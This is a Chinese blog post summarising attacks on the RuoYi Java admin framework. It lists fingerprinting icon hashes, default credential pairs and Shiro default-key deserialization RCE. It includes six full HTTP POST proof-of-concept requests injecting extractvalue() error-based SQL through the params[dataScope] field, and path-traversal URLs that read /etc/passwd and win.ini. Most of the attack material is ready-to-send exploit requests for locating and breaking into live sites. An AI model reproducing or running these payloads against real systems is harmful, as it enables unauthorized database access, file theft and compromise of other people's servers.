当前位置: 首页 > news >正文

若依(RuoYi)框架漏洞总结

news 2026/6/13 13:10:26

image

0x01 特征
绿若依
icon_hash=”706913071”

image
image

蓝若依
icon_hash=” -1231872293”

image

0x02 漏洞

弱口令

用户:admin ruoyi druid            
密码:123456 admin druid admin123 admin888

若依前台默认shiro key命令执行漏洞
若依默认使用shiro组件,所以可以试试shiro经典的rememberMe漏洞来getshell。

影响版本
RuoYi<V-4.6.2

密钥存放位置
image

默认密钥
image

RuoYi-4.6.2版本开始就使用随机密钥的方式,而不使用固定密钥,若要使用固定密钥需要开发者自己指定密钥,因此4.6.2版本以后,在没有获取到密钥的请情况下无法再进行利用。

RuoYi-4.2版本使用的是shiro-1.4.2在该版本和该版本之后都需要勾选AES GCM模式。

SQL注入

  • /system/role/list接口(<V-4.6.2)
    接口
    image
    POC
POST /system/role/list HTTP/1.1
Host: 
Content-Length: 200
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=ddbcb9ac-2a67-46a4-88d8-fbf6a00d53fc
Connection: keep-alivepageSize=10&pageNum=1&orderByColumn=roleSort&isAsc=asc&roleName=&roleKey=&status=&params%5BbeginTime%5D=&params%5BendTime%5D=&params[dataScope]=and extractvalue(1,concat(0x7e,(select version()),0x7e))

image

  • /system/role/export (<V-4.6.2)
    image
    POC
POST /system/role/export HTTP/1.1
Host: 
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-aliveparams[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))

image

  • /system/user/list (<V-4.6.2)
    POC
POST /system/user/list HTTP/1.1
Host: 
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-aliveparams[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))

image

  • /system/dept/list (<V-4.6.2)

image

POC

POST /system/dept/list HTTP/1.1
Host: 
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-aliveparams[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))

image

  • /role/authUser/allocatedList (<V-4.6.2)

image
image

POC

POST /system/role/authUser/allocatedList HTTP/1.1
Host: 
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-aliveparams[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))

image

  • /role/authUser/unallocatedList
    POC
POST /system/role/authUser/unallocatedList HTTP/1.1
Host: 
Content-Length: 75
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=406b4e69-7fc6-46be-977c-f4452ba949e2
Connection: keep-aliveparams[dataScope]=and+extractvalue(1,concat(0x7e,(select+database()),0x7e))

image

CNVD-2021-01931任意文件下载
影响版本
RuoYi<4.5.1

路径

/common/download/resource
/common/download/resource?resource=/profile/../../../../etc/passwd
/common/download/resource?resource=/profile/../../../../Windows/win.ini

image

http://www.rkmt.cn/news/7448.html

相关文章:

  • 第一次个人项目作业_论文查重
  • 2025年版《中科院期刊分区表》与2023年版对比表,附名单可直接查阅
  • 2019年双因素认证最佳实践指南
  • oracle 删除重复数据
  • Account Kit(华为账号服务)再进化,开发者接入效率飙升!
  • [踩坑劝退]批量生成 grafana dashboard 的技术
  • 关于proxmox 制作虚拟机模板的动态dhcp问题
  • 2025/9/18 总结
  • PuTTY下载和安装
  • python基础篇-集合
  • 282 项多模态胃肠病学数据集:适配 VLM 与 MLLM 微调,融合医学图像与临床文本的医疗 AI 训练数据
  • JavaDay7
  • 腾讯混元 3D 3.0 模型发布
  • 前端场景题笔记
  • 9 月记录
  • 关于如何读懂 P11832 [省选联考 2025] 图排列?
  • React添加路由切换过渡动画
  • mjs和mts
  • 有点意思!Java8后最有用新特性排行榜!
  • 数据结构 Trick 之:KDT 求 k 近/远 点
  • .NET 8程序配置版本及产品信息
  • C语言第二讲:进制转化
  • 抽象代数-学习笔记
  • ClickHouse 表引擎深度解析:ReplacingMergeTree、PARTITION、PRIMARY KEY、ORDER BY 详解 - 若
  • web5(phps源码泄露)
  • web3(自带网络工具包查看数据)
  • ctfshow_web11
  • ctfshow_web13
  • ctfshow_web9
  • pom 依赖